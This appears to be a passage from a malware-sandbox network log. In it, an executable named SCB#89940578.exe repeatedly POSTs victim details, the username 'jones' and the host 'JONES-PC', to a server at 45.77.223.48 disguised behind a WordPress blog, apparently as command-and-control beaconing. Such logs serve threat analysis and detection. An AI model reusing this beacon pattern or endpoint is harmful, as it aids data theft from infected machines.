Apr 26, 2024 04:43:11.518605947 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-
Apr 26, 2024 04:43:11.518826962 CEST	1289	IN	Data Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 61 6e 63 68 6f 72 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 69 6c 6c 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 7d 2e 77 70 2d 62 6c 6f 63 Data Ascii: .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link{background-color:#f0f0f0;color:#444}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-ama

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49788	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:11.850755930 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:12.038635969 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:12.917645931 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:11 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:12.917958975 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:12.934223890 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:12.939455032 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:12.939558983 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:12.939598083 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:12.940215111 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:12.940279961 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:12.940351009 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:13.106101036 CEST	1289	IN	Data Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 0a Data Ascii: <style id='wp-block-site-title-inline-css'>.wp-block-site-title a{color:inherit}</style><style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49789	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:13.266385078 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:13.455580950 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:14.381149054 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:13 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:14.381249905 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:14.381290913 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:14.390116930 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:14.390353918 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:14.390393972 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:14.390532017 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:14.390885115 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:14.390933037 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:14.390974045 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49790	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:14.708231926 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:14.896835089 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:15.810297966 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:14 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:15.810444117 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:15.810482025 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:15.821813107 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:15.822232962 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:15.822289944 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:15.822366953 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:15.822524071 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:15.822578907 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:15.822618008 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49791	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:16.174844027 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:16.363396883 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:17.296164989 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:16 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:17.296226978 CEST	64	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
Apr 26, 2024 04:43:17.296262026 CEST	77	IN	Data Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:17.303306103 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:17.303770065 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:17.303811073 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:17.303853035 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 26, 2024 04:43:17.303936958 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 26, 2024 04:43:17.303977966 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 26, 2024 04:43:17.304017067 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49792	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:17.632926941 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:17.821742058 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:18.720782995 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:17 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:18.721404076 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:18.729526997 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:18.729626894 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
